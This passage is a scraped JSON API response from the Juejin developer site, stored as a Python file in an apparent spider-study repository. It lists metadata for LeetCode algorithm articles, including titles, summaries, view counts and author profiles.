62ca945793b8ded662bede34c74e0fa6bba7a0dd | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/LeetCode/juejin_177.py | 66305002a453b443f0d8c1698db9ad711222a8ac | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,057 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6998707022577270798", "article_info": {"article_id": "6998707022577270798", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1c61aeeaab454bf78df10f818e5653f2~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「链表」leetcode 237.删除链表中的节点(简单)", "brief_content": "一、了解题目 附上原题链接:237. 
删除链表中的节点 请编写一个函数,使其可以删除某个链表中给定的(非末尾)节点。传入函数的唯一参数为 要被删除的节点 。 示例: 现有一个链表 -- head = ", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629513492", "mtime": "1629538948", "rtime": "1629524147", "draft_id": "6998705842656641031", "view_count": 68, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00074255, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, 
"ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6998707022577270798, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6844903889771167752", "article_info": {"article_id": "6844903889771167752", "user_id": "3403743728515246", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 攻略 - 2019 年 7 月上半月汇总(55 题攻略)", "brief_content": "自 2019-05-16 开始,jsliang 每天折腾一道及以上 LeetCode 题目,并将其解题思路记录成文章,发布到 GitHub 和 微信公众号。 2019/08/15 前。LeetCode 简单难度题目 - 完成 100 道简单 LeetCode 题目的题解。 20…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1563171733", "mtime": "1604316971", "rtime": "1563171733", "draft_id": "6845076375024435208", "view_count": 3858, "collect_count": 75, "digg_count": 68, "comment_count": 11, "hot_index": 271, "is_hot": 0, "rank_index": 0.00074102, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3403743728515246", "user_name": "jsliang", "company": "金山办公软件", "job_title": "联系方式看个人主页", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/fae2936a68be7eac2c5477f18a875fb2~300x300.image", "level": 6, "description": "不折腾的前端,跟咸鱼有什么区别", 
"followee_count": 20, "follower_count": 15078, "post_article_count": 108, "digg_article_count": 512, "got_digg_count": 13744, "got_view_count": 814343, "post_shortmsg_count": 12, "digg_shortmsg_count": 12, "isfollowed": false, "favorable_author": 1, "power": 21911, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6844903889771167752, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": 
"2021091516023101020405304626004CE7"}, {"article_id": "6994069448957116424", "article_info": {"article_id": "6994069448957116424", "user_id": "3790771823848935", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bda05ced978d450083bae9b3bdc5946d~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "前端Leetcode系列|13. 罗马数字转整数", "brief_content": "今天来和小伙伴们一起打卡力扣第13题:罗马数字转整数。 一、题目描述 罗马数字包含以下七种字符: I, V, X, L例如, 罗马数字 2 写做 II ,即为两个并列的 1。12 写做 XII ,即为", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628433831", "mtime": "1628504086", "rtime": "1628480884", "draft_id": "6994065730035515400", "view_count": 92, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00073858, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3790771823848935", "user_name": "芒果啊", "company": "x95333@sohu.com", "job_title": "前端ing", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/11/19/16e8255bc0f64b7f~tplv-t2oaga2asx-image.image", "level": 2, "description": "Endless knowledge, endless learning", "followee_count": 17, "follower_count": 10, "post_article_count": 34, "digg_article_count": 57, "got_digg_count": 81, "got_view_count": 6060, "post_shortmsg_count": 16, "digg_shortmsg_count": 7, "isfollowed": false, "favorable_author": 0, "power": 141, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", 
"category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994069448957116424, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6936441872113991693", "article_info": {"article_id": "6936441872113991693", "user_id": "2462537381852910", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "[leetCode 94.二叉树的中序遍历]|刷题打卡", "brief_content": "给定一个二叉树的根节点 root ,返回它的 中序 遍历。 使用递归解题是该题最简单的解法,我写一个函数,传入需要遍历的二叉树的根节点,函数中判断root是否为空结点,是就直接返回一个空数组[],不是空结点就进行操作。操作中分为三部分,第一部分使其定位到最左下的结点(直到空),…", "is_english": 0, "is_original": 1, "user_index": 7.388384878619027, "original_type": 0, "original_author": "", "content": "", "ctime": 
"1615016312", "mtime": "1615021308", "rtime": "1615021308", "draft_id": "6936372347716780046", "view_count": 298, "collect_count": 1, "digg_count": 17, "comment_count": 4, "hot_index": 35, "is_hot": 0, "rank_index": 0.00072919, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2462537381852910", "user_name": "蟹黄同学", "company": "", "job_title": "前端 @ 未来全栈工程师", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1548bec913c0a1720de68d7c26fe1ded~300x300.image", "level": 3, "description": "蟹黄吃到饱,前端搞的好,一个梦想能吃蟹黄吃到饱的前端程序员", "followee_count": 48, "follower_count": 238, "post_article_count": 12, "digg_article_count": 171, "got_digg_count": 1679, "got_view_count": 42714, "post_shortmsg_count": 3, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 2108, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], 
"user_interact": {"id": 6936441872113991693, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6989789225268805639", "article_info": {"article_id": "6989789225268805639", "user_id": "3773179638847261", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/592e86e445464eef8453a6cb02a4f9ef~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "算法(leetode,附思维导图 + 全部解法)300题之(3)无重复字符的最长子串", "brief_content": "标题:算法(leetode,附思维导图 + 全部解法)300题之(3)无重复字符的最长子串 一 题目描述 二 解法总览(思维导图) 三 全部解法 1 方案1 1)代码: 2 方案2 1)代码: 3 方", "is_english": 0, "is_original": 1, "user_index": 2.089693646737103, "original_type": 0, "original_author": "", "content": "", "ctime": "1627437136", "mtime": "1627443036", "rtime": "1627443036", "draft_id": "6989787166981242894", "view_count": 92, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00072567, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3773179638847261", "user_name": "码农三少", "company": "百度", "job_title": "百度前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/8301f5ea3bfc02a837cd4d1d7eefd0bd~300x300.image", "level": 1, "description": "前端(主攻数据可视化);半年内实现了个人公众号从0到5.8K+的增长;数独", "followee_count": 49, "follower_count": 7, "post_article_count": 24, "digg_article_count": 17, "got_digg_count": 33, "got_view_count": 2106, "post_shortmsg_count": 0, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 54, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, 
"select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6989789225268805639, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "7000932485362090014", "article_info": {"article_id": "7000932485362090014", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6d7ad6f2fb614e8285a4bd3bbd6c366f~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「字符串」leetcode 
9.判断是否是回文数(简单)", "brief_content": "一、了解题目 附上原题链接:9. 回文数 给你一个整数 x ,如果 x 是一个回文整数,返回 true ;否则,返回 false 。 回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1630031637", "mtime": "1630056524", "rtime": "1630056524", "draft_id": "6999904991586549768", "view_count": 59, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.0007145, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 7000932485362090014, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6994435150604042247", "article_info": {"article_id": "6994435150604042247", "user_id": "1371820633892071", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "算法题-顺时针打印矩阵", "brief_content": "题目描述 输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。 分析:矩阵可以用二维数组来模拟。 示例 : 题解 方法一:模拟打印", "is_english": 0, "is_original": 1, "user_index": 1.526738543039035, "original_type": 0, "original_author": "", "content": "", "ctime": "1628518839", "mtime": "1628565734", "rtime": "1628565734", "draft_id": "6994434429179396109", "view_count": 53, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00069257, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1371820633892071", "user_name": "山人Ll", "company": "", "job_title": "前端", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/19a42ba89b6e00ce91d75457218e78ae~300x300.image", "level": 2, "description": "", "followee_count": 8, "follower_count": 4, "post_article_count": 56, "digg_article_count": 111, "got_digg_count": 72, "got_view_count": 3920, "post_shortmsg_count": 2, "digg_shortmsg_count": 1, "isfollowed": false, "favorable_author": 0, "power": 111, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": 
"0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994435150604042247, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6995819745953988644", "article_info": {"article_id": "6995819745953988644", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": 
"https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5f37154c029440cfa0f653f4605c1bf0~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「栈」leetcode 155.取出最小栈", "brief_content": "一、了解题目 附上原题链接:155. 最小栈 设计一个支持 push ,pop ,top 操作,并能在常数时间内检索到最小元素的栈。 push(x) —— 将元素 x 推入栈中。 pop() —— 删", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628841227", "mtime": "1628845230", "rtime": "1628845219", "draft_id": "6995818719293210631", "view_count": 78, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 4, "is_hot": 0, "rank_index": 0.000692, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": 
"JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6995819745953988644, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6992970434635366437", "article_info": {"article_id": "6992970434635366437", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 42 Trapping Rain Water (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第5天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉", "is_english": 0, "is_original": 1, "user_index": 2.147726993971304, "original_type": 0, "original_author": "", "content": "", "ctime": "1628177838", "mtime": "1628233597", "rtime": "1628233597", "draft_id": "6992943741807886366", "view_count": 44, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00068993, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", 
"job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 
